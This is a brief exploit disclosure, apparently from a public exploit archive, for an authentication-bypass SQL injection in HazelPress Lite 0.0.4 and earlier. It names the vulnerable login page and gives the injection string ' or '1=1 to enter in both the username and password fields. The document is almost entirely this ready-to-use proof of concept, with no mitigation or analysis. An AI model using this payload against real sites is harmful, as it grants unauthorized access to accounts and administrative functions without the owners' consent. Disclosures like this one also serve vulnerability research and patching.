# HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability # By cr4wl3r # Download: http://hazelpress.org/index.php?hazel=downloads # PoC: [path]/login.php # Username: ' or '1=1 # password: ' or '1=1